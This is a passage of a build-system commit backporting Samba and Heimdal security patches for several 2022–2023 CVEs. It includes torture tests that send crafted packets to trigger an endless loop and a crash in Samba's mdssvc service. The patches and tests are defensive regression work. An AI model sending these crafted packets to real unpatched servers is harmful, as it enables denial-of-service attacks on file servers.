[PATCH] lib/wind: find_normalize read past end of array + +find_normalize() can under some circumstances read one element +beyond the input array. The contents are discarded immediately +without further use. + +This change prevents the unintended read. + +(cherry picked from commit 357a38fc7fb582ae73f4b7f4a90a4b0b871b149e) + +Change-Id: Ia2759a5632d64f7fa6553f879b5bbbf43ba3513e + +Upstream-Status: Backport [https://github.com/heimdal/heimdal/commit/eb87af0c2d189c25294c7daf483a47b03af80c2c] +CVE: CVE-2022-41916 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + lib/wind/normalize.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/lib/wind/normalize.c b/lib/wind/normalize.c +index 20e8a4a04b..8f3991d10e 100644 +--- a/lib/wind/normalize.c ++++ b/lib/wind/normalize.c +@@ -227,9 +227,9 @@ find_composition(const uint32_t *in, unsigned in_len) + unsigned i; + + if (n % 5 == 0) { +- cur = *in++; + if (in_len-- == 0) + return c->val; ++ cur = *in++; + } + + i = cur >> 16; diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2022-45142.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-45142.patch new file mode 100644 index 0000000000..d6b9826e4b --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-45142.patch @@ -0,0 +1,51 @@ +From: Helmut Grohne <helmut@...divi.de> +Subject: [PATCH v3] CVE-2022-45142: gsskrb5: fix accidental logic inversions + +The referenced commit attempted to fix miscompilations with gcc-9 and +gcc-10 by changing `memcmp(...)` to `memcmp(...) != 0`. Unfortunately, +it also inverted the result of the comparison in two occasions. This +inversion happened during backporting the patch to 7.7.1 and 7.8.0. + +Fixes: f6edaafcfefd ("gsskrb5: CVE-2022-3437 Use constant-time memcmp() + for arcfour unwrap") +Signed-off-by: Helmut Grohne <helmut@...divi.de> + +Upstream-Status: Backport [https://www.openwall.com/lists/oss-security/2023/02/08/1] +CVE: CVE-2022-45142 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + lib/gssapi/krb5/arcfour.c | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +Changes since v1: + * Fix typo in commit message. + * Mention 7.8.0 in commit message. Thanks to Jeffrey Altman. + +Changes since v2: + * Add CVE identifier. + +diff --git a/lib/gssapi/krb5/arcfour.c b/lib/gssapi/krb5/arcfour.c +index e838d007a..eee6ad72f 100644 +--- a/lib/gssapi/krb5/arcfour.c ++++ b/lib/gssapi/krb5/arcfour.c +@@ -365,7 +365,7 @@ _gssapi_verify_mic_arcfour(OM_uint32 * minor_status, + return GSS_S_FAILURE; + } + +- cmp = (ct_memcmp(cksum_data, p + 8, 8) == 0); ++ cmp = (ct_memcmp(cksum_data, p + 8, 8) != 0); + if (cmp) { + *minor_status = 0; + return GSS_S_BAD_MIC; +@@ -730,7 +730,7 @@ OM_uint32 _gssapi_unwrap_arcfour(OM_uint32 *minor_status, + return GSS_S_FAILURE; + } + +- cmp = (ct_memcmp(cksum_data, p0 + 16, 8) == 0); /* SGN_CKSUM */ ++ cmp = (ct_memcmp(cksum_data, p0 + 16, 8) != 0); /* SGN_CKSUM */ + if (cmp) { + _gsskrb5_release_buffer(minor_status, output_message_buffer); + *minor_status = 0; +-- +2.38.1 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-0922.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-0922.patch new file mode 100644 index 0000000000..b8cb06bee1 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-0922.patch @@ -0,0 +1,111 @@ +From 04e5a7eb03a1e913f34d77b7b6c2353b41ef546a Mon Sep 17 00:00:00 2001 +From: Rob van der Linde <rob@catalyst.net.nz> +Date: Mon, 27 Feb 2023 14:06:23 +1300 +Subject: [PATCH] CVE-2023-0922 set default ldap client sasl wrapping to seal + +This avoids sending new or reset passwords in the clear +(integrity protected only) from samba-tool in particular. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15315 + +Signed-off-by: Rob van der Linde <rob@catalyst.net.nz> +Signed-off-by: Andrew Bartlett <abartlet@samba.org> +Reviewed-by: Joseph Sutton <josephsutton@catalyst.net.nz> + +CVE: CVE-2023-0922 + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/04e5a7eb03a] + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + .../ldap/clientldapsaslwrapping.xml | 27 +++++++++---------- + lib/param/loadparm.c | 2 +- + python/samba/tests/auth_log.py | 2 +- + source3/param/loadparm.c | 2 +- + 4 files changed, 16 insertions(+), 17 deletions(-) + +diff --git a/docs-xml/smbdotconf/ldap/clientldapsaslwrapping.xml b/docs-xml/smbdotconf/ldap/clientldapsaslwrapping.xml +index 3152f06..21bd209 100644 +--- a/docs-xml/smbdotconf/ldap/clientldapsaslwrapping.xml ++++ b/docs-xml/smbdotconf/ldap/clientldapsaslwrapping.xml +@@ -18,25 +18,24 @@ + </para> + + <para> +- This option is needed in the case of Domain Controllers enforcing +- the usage of signed LDAP connections (e.g. Windows 2000 SP3 or higher). +- LDAP sign and seal can be controlled with the registry key +- "<literal>HKLM\System\CurrentControlSet\Services\</literal> +- <literal>NTDS\Parameters\LDAPServerIntegrity</literal>" +- on the Windows server side. +- </para> ++ This option is needed firstly to secure the privacy of ++ administrative connections from <command>samba-tool</command>, ++ including in particular new or reset passwords for users. For ++ this reason the default is <emphasis>seal</emphasis>.</para> + +- <para> +- Depending on the used KRB5 library (MIT and older Heimdal versions) +- it is possible that the message "integrity only" is not supported. +- In this case, <emphasis>sign</emphasis> is just an alias for +- <emphasis>seal</emphasis>. ++ <para>Additionally, <command>winbindd</command> and the ++ <command>net</command> tool can use LDAP to communicate with ++ Domain Controllers, so this option also controls the level of ++ privacy for those connections. All supported AD DC versions ++ will enforce the usage of at least signed LDAP connections by ++ default, so a value of at least <emphasis>sign</emphasis> is ++ required in practice. + </para> + + <para> +- The default value is <emphasis>sign</emphasis>. That implies synchronizing the time ++ The default value is <emphasis>seal</emphasis>. That implies synchronizing the time + with the KDC in the case of using <emphasis>Kerberos</emphasis>. + </para> + </description> +-<value type="default">sign</value> ++<value type="default">seal</value> + </samba:parameter> +diff --git a/lib/param/loadparm.c b/lib/param/loadparm.c +index 75687f5..d260691 100644 +--- a/lib/param/loadparm.c ++++ b/lib/param/loadparm.c +@@ -2970,7 +2970,7 @@ struct loadparm_context *loadparm_init(TALLOC_CTX *mem_ctx) + + lpcfg_do_global_parameter(lp_ctx, "ldap debug threshold", "10"); + +- lpcfg_do_global_parameter(lp_ctx, "client ldap sasl wrapping", "sign"); ++ lpcfg_do_global_parameter(lp_ctx, "client ldap sasl wrapping", "seal"); + + lpcfg_do_global_parameter(lp_ctx, "mdns name", "netbios"); + +diff --git a/python/samba/tests/auth_log.py b/python/samba/tests/auth_log.py +index 8ac76fe..d2db380 100644 +--- a/python/samba/tests/auth_log.py ++++ b/python/samba/tests/auth_log.py +@@ -471,7 +471,7 @@ class AuthLogTests(samba.tests.auth_log_base.AuthLogTestBase): + def isLastExpectedMessage(msg): + return (msg["type"] == "Authorization" and + msg["Authorization"]["serviceDescription"] == "LDAP" and +- msg["Authorization"]["transportProtection"] == "SIGN" and ++ msg["Authorization"]["transportProtection"] == "SEAL" and + msg["Authorization"]["authType"] == "krb5") + + self.samdb = SamDB(url="ldap://%s" % os.environ["SERVER"], +diff --git a/source3/param/loadparm.c b/source3/param/loadparm.c +index a99ab35..c47c5f6 100644 +--- a/source3/param/loadparm.c ++++ b/source3/param/loadparm.c +@@ -754,7 +754,7 @@ static void init_globals(struct loadparm_context *lp_ctx, bool reinit_globals) + Globals.ldap_debug_level = 0; + Globals.ldap_debug_threshold = 10; + +- Globals.client_ldap_sasl_wrapping = ADS_AUTH_SASL_SIGN; ++ Globals.client_ldap_sasl_wrapping = ADS_AUTH_SASL_SEAL; + + Globals.ldap_server_require_strong_auth = + LDAP_SERVER_REQUIRE_STRONG_AUTH_YES; +-- +2.40.0 + diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34966_0001.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34966_0001.patch new file mode 100644 index 0000000000..77a383f09e --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34966_0001.patch @@ -0,0 +1,78 @@ +From 38664163fcac985d87e4274d198568e0fe88595e Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Fri, 26 May 2023 13:06:19 +0200 +Subject: [PATCH] CVE-2023-34966: mdssvc: harden sl_unpack_loop() + +A malicious client could send a packet where subcount is zero, leading to a busy +loop because + + count -= subcount +=> count -= 0 +=> while (count > 0) + +loops forever. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15340 + +Signed-off-by: Ralph Boehme <slow@samba.org> + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/38664163fcac985d87e4274d198568e0fe88595e] + +CVE: CVE-2023-34966 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + source3/rpc_server/mdssvc/marshalling.c | 10 +++++----- + 1 file changed, 5 insertions(+), 5 deletions(-) + +diff --git a/source3/rpc_server/mdssvc/marshalling.c b/source3/rpc_server/mdssvc/marshalling.c +index 9ba6ef571f2..d794ba15838 100644 +--- a/source3/rpc_server/mdssvc/marshalling.c ++++ b/source3/rpc_server/mdssvc/marshalling.c +@@ -1119,7 +1119,7 @@ static ssize_t sl_unpack_loop(DALLOC_CTX *query, + sl_nil_t nil = 0; + + subcount = tag.count; +- if (subcount > count) { ++ if (subcount < 1 || subcount > count) { + return -1; + } + for (i = 0; i < subcount; i++) { +@@ -1147,7 +1147,7 @@ static ssize_t sl_unpack_loop(DALLOC_CTX *query, + + case SQ_TYPE_INT64: + subcount = sl_unpack_ints(query, buf, offset, bufsize, encoding); +- if (subcount == -1 || subcount > count) { ++ if (subcount < 1 || subcount > count) { + return -1; + } + offset += tag.size; +@@ -1156,7 +1156,7 @@ static ssize_t sl_unpack_loop(DALLOC_CTX *query, + + case SQ_TYPE_UUID: + subcount = sl_unpack_uuid(query, buf, offset, bufsize, encoding); +- if (subcount == -1 || subcount > count) { ++ if (subcount < 1 || subcount > count) { + return -1; + } + offset += tag.size; +@@ -1165,7 +1165,7 @@ static ssize_t sl_unpack_loop(DALLOC_CTX *query, + + case SQ_TYPE_FLOAT: + subcount = sl_unpack_floats(query, buf, offset, bufsize, encoding); +- if (subcount == -1 || subcount > count) { ++ if (subcount < 1 || subcount > count) { + return -1; + } + offset += tag.size; +@@ -1174,7 +1174,7 @@ static ssize_t sl_unpack_loop(DALLOC_CTX *query, + + case SQ_TYPE_DATE: + subcount = sl_unpack_date(query, buf, offset, bufsize, encoding); +- if (subcount == -1 || subcount > count) { ++ if (subcount < 1 || subcount > count) { + return -1; + } + offset += tag.size; +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34966_0002.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34966_0002.patch new file mode 100644 index 0000000000..a86d1729cf --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34966_0002.patch @@ -0,0 +1,140 @@ +From 10b6890d26b3c7a829a9e9a05ad1d1ff54daeca9 Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Wed, 31 May 2023 15:34:26 +0200 +Subject: [PATCH] CVE-2023-34966: CI: test for sl_unpack_loop() + +Send a maliciously crafted packet where a nil type has a subcount of 0. This +triggers an endless loop in mdssvc sl_unpack_loop(). + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15340 + +Signed-off-by: Ralph Boehme <slow@samba.org> + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/10b6890d26b3c7a829a9e9a05ad1d1ff54daeca9] + +CVE: CVE-2023-34966 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + source4/torture/rpc/mdssvc.c | 100 +++++++++++++++++++++++++++++++++++ + 1 file changed, 100 insertions(+) + +diff --git a/source4/torture/rpc/mdssvc.c b/source4/torture/rpc/mdssvc.c +index 2d2a8306412..a9956ef8f1d 100644 +--- a/source4/torture/rpc/mdssvc.c ++++ b/source4/torture/rpc/mdssvc.c +@@ -581,6 +581,102 @@ done: + return ok; + } + ++static uint8_t test_sl_unpack_loop_buf[] = { ++ 0x34, 0x33, 0x32, 0x31, 0x33, 0x30, 0x64, 0x6d, ++ 0x1d, 0x00, 0x00, 0x00, 0x16, 0x00, 0x00, 0x00, ++ 0x01, 0x00, 0x00, 0x02, 0x01, 0x00, 0x00, 0x00, ++ 0x01, 0x00, 0x00, 0x02, 0x02, 0x00, 0x00, 0x00, ++ 0x01, 0x00, 0x00, 0x02, 0x03, 0x00, 0x00, 0x00, ++ 0x06, 0x00, 0x00, 0x07, 0x04, 0x00, 0x00, 0x00, ++ 0x66, 0x65, 0x74, 0x63, 0x68, 0x41, 0x74, 0x74, ++ 0x72, 0x69, 0x62, 0x75, 0x74, 0x65, 0x73, 0x3a, ++ 0x66, 0x6f, 0x72, 0x4f, 0x49, 0x44, 0x41, 0x72, ++ 0x72, 0x61, 0x79, 0x3a, 0x63, 0x6f, 0x6e, 0x74, ++ 0x65, 0x78, 0x74, 0x3a, 0x00, 0x00, 0x00, 0xea, ++ 0x02, 0x00, 0x00, 0x84, 0x02, 0x00, 0x00, 0x00, ++ 0x0a, 0x50, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, ++ 0x01, 0x00, 0x00, 0x02, 0x04, 0x00, 0x00, 0x00, ++ 0x01, 0x00, 0x00, 0x02, 0x05, 0x00, 0x00, 0x00, ++ 0x03, 0x00, 0x00, 0x07, 0x03, 0x00, 0x00, 0x00, ++ 0x6b, 0x4d, 0x44, 0x49, 0x74, 0x65, 0x6d, 0x50, ++ 0x61, 0x74, 0x68, 0x00, 0x00, 0x00, 0x00, 0x00, ++ 0x01, 0x00, 0x00, 0x02, 0x06, 0x00, 0x00, 0x00, ++ 0x03, 0x00, 0x00, 0x87, 0x08, 0x00, 0x00, 0x00, ++ 0x01, 0x00, 0xdd, 0x0a, 0x20, 0x00, 0x00, 0x6b, ++ 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, ++ 0x07, 0x00, 0x00, 0x88, 0x00, 0x00, 0x00, 0x00, ++ 0x02, 0x00, 0x00, 0x0a, 0x03, 0x00, 0x00, 0x00, ++ 0x03, 0x00, 0x00, 0x0a, 0x03, 0x00, 0x00, 0x00, ++ 0x04, 0x00, 0x00, 0x0c, 0x04, 0x00, 0x00, 0x00, ++ 0x0e, 0x00, 0x00, 0x0a, 0x01, 0x00, 0x00, 0x00, ++ 0x0f, 0x00, 0x00, 0x0c, 0x03, 0x00, 0x00, 0x00, ++ 0x13, 0x00, 0x00, 0x1a, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x00, 0x00 ++}; ++ ++static bool test_mdssvc_sl_unpack_loop(struct torture_context *tctx, ++ void *data) ++{ ++ struct torture_mdsscv_state *state = talloc_get_type_abort( ++ data, struct torture_mdsscv_state); ++ struct dcerpc_binding_handle *b = state->p->binding_handle; ++ struct mdssvc_blob request_blob; ++ struct mdssvc_blob response_blob; ++ uint32_t device_id; ++ uint32_t unkn2; ++ uint32_t unkn9; ++ uint32_t fragment; ++ uint32_t flags; ++ NTSTATUS status; ++ bool ok = true; ++ ++ device_id = UINT32_C(0x2f000045); ++ unkn2 = 23; ++ unkn9 = 0; ++ fragment = 0; ++ flags = UINT32_C(0x6b000001); ++ ++ request_blob.spotlight_blob = test_sl_unpack_loop_buf; ++ request_blob.size = sizeof(test_sl_unpack_loop_buf); ++ request_blob.length = sizeof(test_sl_unpack_loop_buf); ++ ++ response_blob.spotlight_blob = talloc_array(state, ++ uint8_t, ++ 0); ++ torture_assert_not_null_goto(tctx, response_blob.spotlight_blob, ++ ok, done, "dalloc_zero failed\n"); ++ response_blob.size = 0; ++ ++ status = dcerpc_mdssvc_cmd(b, ++ state, ++ &state->ph, ++ 0, ++ device_id, ++ unkn2, ++ 0, ++ flags, ++ request_blob, ++ 0, ++ 64 * 1024, ++ 1, ++ 64 * 1024, ++ 0, ++ 0, ++ &fragment, ++ &response_blob, ++ &unkn9); ++ torture_assert_ntstatus_ok_goto( ++ tctx, status, ok, done, ++ "dcerpc_mdssvc_unknown1 failed\n"); ++ ++done: ++ return ok; ++} ++ + static bool test_mdssvc_invalid_ph_close(struct torture_context *tctx, + void *data) + { +@@ -856,5 +952,9 @@ struct torture_suite *torture_rpc_mdssvc(TALLOC_CTX *mem_ctx) + "fetch_unknown_cnid", + test_mdssvc_fetch_attr_unknown_cnid); + ++ torture_tcase_add_simple_test(tcase, ++ "mdssvc_sl_unpack_loop", ++ test_mdssvc_sl_unpack_loop); ++ + return suite; + } +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34967_0001.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34967_0001.patch new file mode 100644 index 0000000000..e30e54ab96 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34967_0001.patch @@ -0,0 +1,178 @@ +From 3b3c30e2acfb00d04c4013e32343bc277d5b1aa8 Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Wed, 31 May 2023 16:26:14 +0200 +Subject: [PATCH] CVE-2023-34967: CI: add a test for type checking of + dalloc_value_for_key() + +Sends a maliciously crafted packet where the value in a key/value style +dictionary for the "scope" key is a simple string object whereas the server +expects an array. As the server doesn't perform type validation on the value, it +crashes when trying to use the "simple" object as a "complex" one. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15341 + +Signed-off-by: Ralph Boehme <slow@samba.org> + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/3b3c30e2acfb00d04c4013e32343bc277d5b1aa8] + +CVE: CVE-2023-34967 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + source4/torture/rpc/mdssvc.c | 134 +++++++++++++++++++++++++++++++++++ + 1 file changed, 134 insertions(+) + +diff --git a/source4/torture/rpc/mdssvc.c b/source4/torture/rpc/mdssvc.c +index f5f5939..1dce403 100644 +--- a/source4/torture/rpc/mdssvc.c ++++ b/source4/torture/rpc/mdssvc.c +@@ -666,6 +666,136 @@ done: + return ok; + } + ++static bool test_sl_dict_type_safety(struct torture_context *tctx, ++ void *data) ++{ ++ struct torture_mdsscv_state *state = talloc_get_type_abort( ++ data, struct torture_mdsscv_state); ++ struct dcerpc_binding_handle *b = state->p->binding_handle; ++ struct mdssvc_blob request_blob; ++ struct mdssvc_blob response_blob; ++ uint64_t ctx1 = 0xdeadbeef; ++ uint64_t ctx2 = 0xcafebabe; ++ uint32_t device_id; ++ uint32_t unkn2; ++ uint32_t unkn9; ++ uint32_t fragment; ++ uint32_t flags; ++ DALLOC_CTX *d = NULL; ++ sl_array_t *array1 = NULL, *array2 = NULL; ++ sl_dict_t *arg = NULL; ++ int result; ++ NTSTATUS status; ++ bool ok = true; ++ ++ device_id = UINT32_C(0x2f000045); ++ unkn2 = 23; ++ unkn9 = 0; ++ fragment = 0; ++ flags = UINT32_C(0x6b000001); ++ ++ d = dalloc_new(tctx); ++ torture_assert_not_null_goto(tctx, d, ++ ok, done, "dalloc_new failed\n"); ++ ++ array1 = dalloc_zero(d, sl_array_t); ++ torture_assert_not_null_goto(tctx, array1, ++ ok, done, "dalloc_zero failed\n"); ++ ++ array2 = dalloc_zero(d, sl_array_t); ++ torture_assert_not_null_goto(tctx, array2, ++ ok, done, "dalloc_new failed\n"); ++ ++ result = dalloc_stradd(array2, "openQueryWithParams:forContext:"); ++ torture_assert_goto(tctx, result == 0, ++ ok, done, "dalloc_stradd failed\n"); ++ ++ result = dalloc_add_copy(array2, &ctx1, uint64_t); ++ torture_assert_goto(tctx, result == 0, ++ ok, done, "dalloc_stradd failed\n"); ++ ++ result = dalloc_add_copy(array2, &ctx2, uint64_t); ++ torture_assert_goto(tctx, result == 0, ++ ok, done, "dalloc_stradd failed\n"); ++ ++ arg = dalloc_zero(array1, sl_dict_t); ++ torture_assert_not_null_goto(tctx, d, ++ ok, done, "dalloc_zero failed\n"); ++ ++ result = dalloc_stradd(arg, "kMDQueryString"); ++ torture_assert_goto(tctx, result == 0, ++ ok, done, "dalloc_stradd failed\n"); ++ ++ result = dalloc_stradd(arg, "*"); ++ torture_assert_goto(tctx, result == 0, ++ ok, done, "dalloc_stradd failed\n"); ++ ++ result = dalloc_stradd(arg, "kMDScopeArray"); ++ torture_assert_goto(tctx, result == 0, ++ ok, done, "dalloc_stradd failed\n"); ++ ++ result = dalloc_stradd(arg, "AAAABBBB"); ++ torture_assert_goto(tctx, result == 0, ++ ok, done, "dalloc_stradd failed\n"); ++ ++ result = dalloc_add(array1, array2, sl_array_t); ++ torture_assert_goto(tctx, result == 0, ++ ok, done, "dalloc_add failed\n"); ++ ++ result = dalloc_add(array1, arg, sl_dict_t); ++ torture_assert_goto(tctx, result == 0, ++ ok, done, "dalloc_add failed\n"); ++ ++ result = dalloc_add(d, array1, sl_array_t); ++ torture_assert_goto(tctx, result == 0, ++ ok, done, "dalloc_add failed\n"); ++ ++ torture_comment(tctx, "%s", dalloc_dump(d, 0)); ++ ++ request_blob.spotlight_blob = talloc_array(tctx, ++ uint8_t, ++ 64 * 1024); ++ torture_assert_not_null_goto(tctx, request_blob.spotlight_blob, ++ ok, done, "dalloc_new failed\n"); ++ request_blob.size = 64 * 1024; ++ ++ request_blob.length = sl_pack(d, ++ (char *)request_blob.spotlight_blob, ++ request_blob.size); ++ torture_assert_goto(tctx, request_blob.length > 0, ++ ok, done, "sl_pack failed\n"); ++ ++ response_blob.spotlight_blob = talloc_array(state, uint8_t, 0); ++ torture_assert_not_null_goto(tctx, response_blob.spotlight_blob, ++ ok, done, "dalloc_zero failed\n"); ++ response_blob.size = 0; ++ ++ status = dcerpc_mdssvc_cmd(b, ++ state, ++ &state->ph, ++ 0, ++ device_id, ++ unkn2, ++ 0, ++ flags, ++ request_blob, ++ 0, ++ 64 * 1024, ++ 1, ++ 64 * 1024, ++ 0, ++ 0, ++ &fragment, ++ &response_blob, ++ &unkn9); ++ torture_assert_ntstatus_ok_goto( ++ tctx, status, ok, done, ++ "dcerpc_mdssvc_cmd failed\n"); ++ ++done: ++ return ok; ++} ++ + static bool test_mdssvc_invalid_ph_close(struct torture_context *tctx, + void *data) + { +@@ -940,6 +1070,10 @@ struct torture_suite *torture_rpc_mdssvc(TALLOC_CTX *mem_ctx) + torture_tcase_add_simple_test(tcase, + "mdssvc_sl_unpack_loop", + test_mdssvc_sl_unpack_loop); ++ torture_tcase_add_simple_test(tcase, ++ "sl_dict_type_safety", ++ test_sl_dict_type_safety); ++ + + return suite; + } +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34967_0002.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34967_0002.patch new file mode 100644 index 0000000000..2e4907ab62 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34967_0002.patch @@ -0,0 +1,125 @@ +From 049c13245649fab412b61a5b55e5a7dea72d7c72 Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Fri, 26 May 2023 15:06:38 +0200 +Subject: [PATCH] CVE-2023-34967: mdssvc: add type checking to + dalloc_value_for_key() + +Change the dalloc_value_for_key() function to require an additional final +argument which denotes the expected type of the value associated with a key. If +the types don't match, return NULL. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15341 + +Signed-off-by: Ralph Boehme <slow@samba.org> + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/4c60e35add4a1abd04334012a8d6edf1c3f396ba] + +CVE: CVE-2023-34967 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + source3/rpc_server/mdssvc/dalloc.c | 14 ++++++++++---- + source3/rpc_server/mdssvc/mdssvc.c | 17 +++++++++++++---- + 2 files changed, 23 insertions(+), 8 deletions(-) + +diff --git a/source3/rpc_server/mdssvc/dalloc.c b/source3/rpc_server/mdssvc/dalloc.c +index 007702d..8b79b41 100644 +--- a/source3/rpc_server/mdssvc/dalloc.c ++++ b/source3/rpc_server/mdssvc/dalloc.c +@@ -159,7 +159,7 @@ void *dalloc_value_for_key(const DALLOC_CTX *d, ...) + int result = 0; + void *p = NULL; + va_list args; +- const char *type; ++ const char *type = NULL; + int elem; + size_t array_len; + +@@ -170,7 +170,6 @@ void *dalloc_value_for_key(const DALLOC_CTX *d, ...) + array_len = talloc_array_length(d->dd_talloc_array); + elem = va_arg(args, int); + if (elem >= array_len) { +- va_end(args); + result = -1; + goto done; + } +@@ -178,8 +177,6 @@ void *dalloc_value_for_key(const DALLOC_CTX *d, ...) + type = va_arg(args, const char *); + } + +- va_end(args); +- + array_len = talloc_array_length(d->dd_talloc_array); + + for (elem = 0; elem + 1 < array_len; elem += 2) { +@@ -192,8 +189,17 @@ void *dalloc_value_for_key(const DALLOC_CTX *d, ...) + break; + } + } ++ if (p == NULL) { ++ goto done; ++ } ++ ++ type = va_arg(args, const char *); ++ if (strcmp(talloc_get_name(p), type) != 0) { ++ p = NULL; ++ } + + done: ++ va_end(args); + if (result != 0) { + p = NULL; + } +diff --git a/source3/rpc_server/mdssvc/mdssvc.c b/source3/rpc_server/mdssvc/mdssvc.c +index a983a88..fe6e0c2 100644 +--- a/source3/rpc_server/mdssvc/mdssvc.c ++++ b/source3/rpc_server/mdssvc/mdssvc.c +@@ -884,7 +884,8 @@ static bool slrpc_open_query(struct mds_ctx *mds_ctx, + + querystring = dalloc_value_for_key(query, "DALLOC_CTX", 0, + "DALLOC_CTX", 1, +- "kMDQueryString"); ++ "kMDQueryString", ++ "char *"); + if (querystring == NULL) { + DEBUG(1, ("missing kMDQueryString\n")); + goto error; +@@ -924,8 +925,11 @@ static bool slrpc_open_query(struct mds_ctx *mds_ctx, + slq->ctx2 = *uint64p; + + path_scope = dalloc_value_for_key(query, "DALLOC_CTX", 0, +- "DALLOC_CTX", 1, "kMDScopeArray"); ++ "DALLOC_CTX", 1, ++ "kMDScopeArray", ++ "sl_array_t"); + if (path_scope == NULL) { ++ DBG_ERR("missing kMDScopeArray\n"); + goto error; + } + +@@ -940,8 +944,11 @@ static bool slrpc_open_query(struct mds_ctx *mds_ctx, + } + + reqinfo = dalloc_value_for_key(query, "DALLOC_CTX", 0, +- "DALLOC_CTX", 1, "kMDAttributeArray"); ++ "DALLOC_CTX", 1, ++ "kMDAttributeArray", ++ "sl_array_t"); + if (reqinfo == NULL) { ++ DBG_ERR("missing kMDAttributeArray\n"); + goto error; + } + +@@ -949,7 +956,9 @@ static bool slrpc_open_query(struct mds_ctx *mds_ctx, + DEBUG(10, ("requested attributes: %s", dalloc_dump(reqinfo, 0))); + + cnids = dalloc_value_for_key(query, "DALLOC_CTX", 0, +- "DALLOC_CTX", 1, "kMDQueryItemArray"); ++ "DALLOC_CTX", 1, ++ "kMDQueryItemArray", ++ "sl_array_t"); + if (cnids) { + ok = sort_cnids(slq, cnids->ca_cnids); + if (!ok) { +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0001.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0001.patch new file mode 100644 index 0000000000..ad8e3e4ce3 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0001.patch @@ -0,0 +1,104 @@ +From 98b2a013bc723cd660978d5a1db40b987816f90e Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Tue, 6 Jun 2023 15:17:26 +0200 +Subject: [PATCH] CVE-2023-34968: mdssvc: cache and reuse stat info in struct + sl_inode_path_map + +Prepare for the "path" being a fake path and not the real server-side +path where we won't be able to vfs_stat_fsp() this fake path. Luckily we already +got stat info for the object in mds_add_result() so we can just pass stat info +from there. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15388 + +Signed-off-by: Ralph Boehme <slow@samba.org> +Reviewed-by: Stefan Metzmacher <metze@samba.org> + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/98b2a013bc723cd660978d5a1db40b987816f90e] + +CVE: CVE-2023-34968 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + source3/rpc_server/mdssvc/mdssvc.c | 32 +++++++----------------------- + source3/rpc_server/mdssvc/mdssvc.h | 1 + + 2 files changed, 8 insertions(+), 25 deletions(-) + +diff --git a/source3/rpc_server/mdssvc/mdssvc.c b/source3/rpc_server/mdssvc/mdssvc.c +index 26a3ec7..a6cc653 100644 +--- a/source3/rpc_server/mdssvc/mdssvc.c ++++ b/source3/rpc_server/mdssvc/mdssvc.c +@@ -446,7 +446,10 @@ static int ino_path_map_destr_cb(struct sl_inode_path_map *entry) + * entries by calling talloc_free() on the query slq handles. + **/ + +-static bool inode_map_add(struct sl_query *slq, uint64_t ino, const char *path) ++static bool inode_map_add(struct sl_query *slq, ++ uint64_t ino, ++ const char *path, ++ struct stat_ex *st) + { + NTSTATUS status; + struct sl_inode_path_map *entry; +@@ -493,6 +496,7 @@ static bool inode_map_add(struct sl_query *slq, uint64_t ino, const char *path) + + entry->ino = ino; + entry->mds_ctx = slq->mds_ctx; ++ entry->st = *st; + 